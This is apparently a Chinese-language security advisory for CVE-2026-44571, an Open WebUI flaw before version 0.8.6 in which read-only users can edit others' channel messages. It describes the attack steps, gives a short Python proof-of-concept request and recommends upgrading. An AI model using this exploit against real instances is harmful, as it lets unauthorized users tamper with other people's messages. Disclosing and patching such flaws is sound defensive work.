CVE-2026-44571 CVSS 6.5 中危

CVE-2026-44571 Open WebUI 权限绕过漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44571

漏洞类型

越权漏洞

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI 是一个自托管 AI 平台。在 0.8.6 版本之前，存在一处权限绕过漏洞。在标准频道中，当 access_control 设置为 None 时，授权检查函数 has_access 仅验证读取权限。这导致拥有读取权限的用户可以通过 POST /api/v1/channels/{channel_id}/messages/{message_id}/update 端点修改其他用户的消息，破坏了消息完整性。该漏洞已在 0.8.6 版本中修复。

技术细节

该漏洞源于 Open WebUI 在特定 API 端点的访问控制逻辑缺陷。受影响的应用程序版本中，`POST /api/v1/channels/{channel_id}/messages/{message_id}/update` 接口用于更新消息。在标准频道（非群组或 DM）场景下，当 `access_control` 参数被设置为 `None` 时，系统执行 `has_access(..., type="read")` 检查。由于逻辑错误，该检查返回 `True`，使得仅有读取权限的用户被错误地授予了写入权限。攻击者无需拥有消息所有权，即可利用此逻辑漏洞构造恶意请求，篡改频道内其他用户的消息内容，导致数据完整性受损。

攻击链分析

STEP 1

信息收集

攻击者识别目标 Open WebUI 实例，并找到一个他们拥有读取权限的标准频道。

STEP 2

权限分析

确认目标版本低于 0.8.6，且 access_control 机制可能存在缺陷。

STEP 3

构造请求

获取频道 ID 和其他用户的消息 ID，构造 POST 请求发送至 /api/v1/channels/{channel_id}/messages/{message_id}/update。

STEP 4

执行攻击

使用仅有读取权限的 Token 发送修改请求，绕过所有权校验。

STEP 5

验证结果

检查频道界面，确认受害者的消息内容已被篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com"
channel_id = "test_channel"
message_id = "target_message_id"
attacker_token = "valid_read_only_token"

# Vulnerable endpoint
url = f"{target_url}/api/v1/channels/{channel_id}/messages/{message_id}/update"

headers = {
    "Authorization": f"Bearer {attacker_token}",
    "Content-Type": "application/json"
}

# Payload to update another user's message
payload = {
    "content": "Updated by unauthorized user via CVE-2026-44571"
}

# Send exploitation request
response = requests.post(url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Exploit successful: Message updated without ownership.")
else:
    print(f"[-] Exploit failed: {response.status_code}")

影响范围

Open WebUI < 0.8.6

防御指南

临时缓解措施

建议立即将 Open WebUI 升级至 0.8.6 或更高版本。如无法立即升级，应严格限制对 Open WebUI 平台的访问权限，仅允许可信用户访问，并在网络层面限制对外暴露，直到完成修复。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表